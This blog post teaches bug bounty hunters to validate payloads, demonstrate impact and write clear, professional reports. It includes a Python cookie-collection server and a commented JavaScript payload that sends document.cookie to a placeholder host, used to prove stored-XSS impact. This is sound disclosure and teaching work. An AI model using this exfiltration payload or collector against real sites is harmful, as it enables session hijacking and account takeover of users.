I’m writing this because I’ve been seeing people struggle to understand when they’re ready to submit a bug report. Maybe they find something interesting as they’re exploring an app through a bug bounty program, and so they immediately think they’re ready to submit the information. Or maybe they’re running automated tools, and the tool declared that it found a successful payload.
Either way, they’re usually not ready to write the report just yet. There’s more to it.
As I helped some of my students this week understand when they’re ready to submit a report, I came up with a set of simple questions you need to ask (and answer completely) to know whether you’re ready.
Read on to see what they are, and how to submit a solid bug bounty report.
Special thanks to Hakluke (a former Bugcrowd employee) for additional tips and details that helped round out the article.
When are you ready to submit a bug bounty report?
You (or a tool you’re running) found something interesting in an application you’re checking out for bugs, and your heart starts to race as you get super excited.
“Can I submit a report right now?!“
That’s probably your immediate thought because you want to make sure you submit it before anyone else does…but chances are, you don’t actually have a bug bounty report to submit yet. You still need to gather more information or figure out if there’s an actual vulnerability that can be exploited in a meaningful way.
The industry often calls these PoCs (Proof of Concepts), and the first word in that acronym is key: proof.
This leads us to the set of questions you need to ask yourself (and answer completely) before you can consider what you have to be ready to go into a bug report:
- Do I have a successful payload? (one you’ve confirmed yourself, not just one your tool flagged as successful)
- Am I able to do something of impact with my payload? (e.g., extract private information, negatively impact customers, etc.)
Let’s break it down further.
Do I have a successful payload?
While not all security bugs require payloads, many do, which is why this is the first question to ask. If your bug doesn’t require a payload (e.g., you checked the page’s source and saw PII), then you can skip straight to the next question.
If what you’re doing does require a payload (SQLi, XSS, etc…), then do you have a payload that actually works?
I’m not talking about an automated tool telling you that a payload was successful. That could be a false positive. I’m asking whether you’ve validated that the payload your tool flagged as successful actually works.
If it’s an XSS payload, does the XSS fire? If it’s an SQL injection payload, does the payload actually manipulate database queries? If not, you haven’t found a successful payload yet.
“My automation tool says the payload was successful” is not enough to submit a bug report. More often than not, it will be a false positive, and even when it isn’t, it may not give the organization enough information to identify and fix the issue.
You have to keep going until you can validate the payload, and then answer this next question…
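One quick sanity check on a scanner’s “successful” XSS finding is whether the payload comes back in the response verbatim or HTML-encoded. A minimal sketch in Python (the function name and sample pages here are illustrative, not from any particular tool):

```python
import html

def reflected_unencoded(body: str, payload: str) -> bool:
    """Heuristic: the raw payload appears verbatim in the response body.

    Scanners often report "success" when the payload string merely comes
    back in the response. If the app HTML-encoded it, the script will
    never execute, and the finding is a false positive. Even a verbatim
    reflection is only a lead: the real proof is seeing the XSS fire in
    a browser.
    """
    return payload in body

payload = "<script>alert(1)</script>"

# The app escaped the payload: a scanner may still flag this, but no XSS fires.
escaped_page = "<p>Results for " + html.escape(payload) + "</p>"
# The app reflected the payload verbatim: worth confirming in a browser.
reflected_page = "<p>Results for " + payload + "</p>"

print(reflected_unencoded(escaped_page, payload))    # False
print(reflected_unencoded(reflected_page, payload))  # True
```

A check like this only filters out the obvious false positives; actually watching the payload execute is what turns it into proof.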
Am I able to do something of impact with my payload?
Let’s say you went through the first question and you validated that a payload works. Again, if we assume you’re going for XSS, you might have found a way to sneak in HTML tags to break out of an input field’s context.
That’s a fantastic starting point, but you’re still not ready to submit a report. Why? Because being able to inject an HTML tag doesn’t necessarily translate into a security impact. If you want a payout, or if you want your report to be taken seriously, you have to attach a security impact to your vulnerability.
For example, if the only HTML tag you’re able to add is a <p> tag and nothing else, then there’s really nothing practical an attacker could do with that. However, if you’re able to inject your own malicious XSS script, and that script is capable of stealing a user’s cookie containing session information, then you could take over a customer’s account holding credit card information or other PII. At that point, you’ve immediately escalated the impact of that vulnerability.
When I found a stored XSS vulnerability in an image alt attribute earlier this year, my process went a little bit like this:
- I noticed that a payload I had injected in an input field was firing on a different page (successful payload: CHECK)
- I tweaked my payload to see if I could access anything of value through the vulnerability, and I noticed I could grab all of the visitor’s cookie information (able to do something of impact: CHECK)
- While I probably could have submitted the report at this point, I wanted to validate whether I’d be able to tweak my payload again to send this cookie information to a remote server, so I modified the payload, set up a listening server, and validated that not only could I grab any visitor’s cookie information, but I could then send that information to a remote server (impact level confirmed and increased)
- Then I was ready to write my report…
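The “listening server” in step 3 above can be as small as a few lines of Python’s standard-library http.server. Everything in this sketch (the handler name, the port, the /steal path, and the sample payload in the comment) is my own illustration of the kind of setup described, not the author’s actual code:

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlparse

captured = []  # query parameters received from the payload's beacon requests

class ExfilHandler(BaseHTTPRequestHandler):
    """Records the query string of every GET, e.g. /steal?c=session%3Dabc123."""

    def do_GET(self):
        captured.append(parse_qs(urlparse(self.path).query))
        self.send_response(200)
        self.end_headers()

    def log_message(self, fmt, *args):
        pass  # keep the console quiet; we only care about `captured`

def run(port=8000):
    # An injected payload would then beacon to this server, e.g.:
    #   new Image().src = "http://YOUR-SERVER:8000/steal?c=" + document.cookie
    HTTPServer(("", port), ExfilHandler).serve_forever()
```

Seeing a victim’s cookie land in a server you control is exactly the kind of evidence that lets you write “impact confirmed” in a report. Only ever do this against in-scope targets, and check the program’s rules on exfiltrating real user data first.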
…So let’s talk about what a good bug bounty report looks like.
What does a good bug report look like?
I asked Hakluke to share his thoughts on this topic because he’s seen his fair share of good and bad bug reports, given that he worked at Bugcrowd (a bug bounty platform). He listed out 5 important things you should have in every single report you write:
- Accuracy
- Professionalism
- Empathy
- Clear reproduction steps
- Clear security impact
It’s unfortunate that he felt the need to include professionalism and empathy 🙂
I’ve seen some reports that come across as rude, condescending, <insert other adjective here>… Not only does that not help your case, it reflects badly on the community as a whole. There’s really no need for it! Triagers have to sift through a large volume of reports and information every day, so please keep that in mind.
When it comes to accuracy and clear reproduction steps, I think it’s worth elaborating a bit more…
As you write your report, try to imagine that you’re the person who’s going to be reading your report. That person has absolutely no idea what you’ve been doing, so they’re missing all of the context that you have from working on finding the security bug (which will usually be hours worth of work that you have to condense into a simple report).
Help them out by providing clear, articulate, and accurate descriptions of where/what/how/who. Avoid jumping to conclusions in your report without explaining how you concluded that.
Try to be articulate in your explanations and use words and sentences that limit the potential for different interpretations. I understand that you may not be a native English speaker (and you may need to report in English), or that grammar may not be your strong suit. There are apps to help you with that. You can also ask someone who is fluent, or better at it, to help proofread (but be careful here: if it’s a private program, you can’t share any information with anyone else).
Finally, the last two points Hakluke made tie back to what I was saying earlier: describe clear reproduction steps (which you’ll be able to do since you answered my first question), and define a clear security impact (which you’ll be able to do since you answered my second question).
If you can’t add those last two things to your report, you do not have a complete report, and you need to test further before you can submit a report.
I hope this was helpful in clarifying what constitutes a good bug bounty report, and also what’s needed to write one. I didn’t include an actual template of what good reports look like because each platform already typically provides templates when you first start your submission.
Also, you can take a look at publicly disclosed reports and see which ones you find easy to follow versus not. This will give you a great indication of how you can write better reports, in addition to what I mentioned in the article.
Thanks for reading, and happy hunting!